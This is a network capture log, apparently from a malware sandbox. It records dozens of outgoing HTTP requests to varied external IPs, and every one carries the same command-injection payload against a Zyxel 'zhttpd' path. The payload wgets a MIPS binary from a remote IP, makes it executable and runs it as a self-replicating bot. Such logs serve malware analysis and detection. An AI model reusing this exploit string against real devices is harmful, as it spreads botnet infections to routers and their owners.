                                                Jan 28, 2024 10:15:51.499363899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                182192.168.2.2334382117.188.242.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499444962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                183192.168.2.2352000135.67.246.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499458075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                184192.168.2.2350170156.185.141.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499478102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                185192.168.2.2345582220.119.195.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499515057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                186192.168.2.2335230106.55.163.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499577045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                187192.168.2.2358808160.212.53.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499583960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                188192.168.2.2350258156.103.70.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499633074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                189192.168.2.2347434221.10.122.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499633074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                190192.168.2.2341448136.54.179.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499656916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                191192.168.2.235835884.158.178.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499722004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                192192.168.2.234724875.40.35.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499763966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                193192.168.2.2348920176.126.133.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499811888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                194192.168.2.235950693.148.237.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499826908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                195192.168.2.2359206202.185.120.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499859095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                196192.168.2.235440453.54.219.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499859095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                197192.168.2.2355850197.130.171.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499864101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                198192.168.2.2342266193.40.198.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499864101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                199192.168.2.236027019.203.53.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499896049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                200192.168.2.2352872114.62.168.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499902010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                201192.168.2.2346494206.131.183.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.499989033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                202192.168.2.234929080.182.0.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500027895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                203192.168.2.2346174164.175.194.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500039101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                204192.168.2.2338138154.157.39.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500096083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                205192.168.2.2332818153.82.3.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500108957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                206192.168.2.235583877.116.235.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500152111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                207192.168.2.2342622218.89.0.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500206947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                208192.168.2.2349284203.195.77.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500257015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                209192.168.2.235209219.65.236.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500297070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                210192.168.2.2360612135.180.171.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500318050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                211192.168.2.2335242115.232.88.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500351906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                212192.168.2.235269064.68.151.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500391960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                213192.168.2.2351258123.251.134.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500406981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                214192.168.2.2358890101.51.137.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500423908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                215192.168.2.2346812175.249.96.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500493050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                216192.168.2.23562044.86.222.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500516891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                217192.168.2.2341232124.170.5.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500541925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                218192.168.2.233431880.26.239.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500557899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                219192.168.2.236051041.109.181.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500624895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                220192.168.2.2338224120.49.226.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500643969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                221192.168.2.2344914105.118.103.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500683069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                222192.168.2.2347350206.103.138.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500787020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                223192.168.2.235176863.37.72.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500796080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                224192.168.2.233338037.126.132.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500794888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                225192.168.2.234079619.243.35.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500801086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                226192.168.2.235618251.223.111.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500814915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                227192.168.2.233874487.2.252.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500823975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                228192.168.2.2358862157.119.118.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500897884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                229192.168.2.233659259.185.146.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500942945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                230192.168.2.2355650122.106.34.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.500976086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                231192.168.2.2357354161.46.50.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501029968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                232192.168.2.236050680.33.162.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501040936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                233192.168.2.2341840216.12.249.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501099110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                234192.168.2.2360864205.163.90.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501123905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                235192.168.2.2347136108.202.98.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501151085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                236192.168.2.2341104114.89.244.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501211882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                237192.168.2.2340152147.244.90.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501213074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                238192.168.2.2342732221.32.144.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501279116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                239192.168.2.234777272.177.34.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501281023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                240192.168.2.2352996162.24.234.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501311064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                241192.168.2.2352796173.5.63.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501353025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                242192.168.2.2352992217.103.21.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501394033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                243192.168.2.2356612175.29.184.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.501431942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
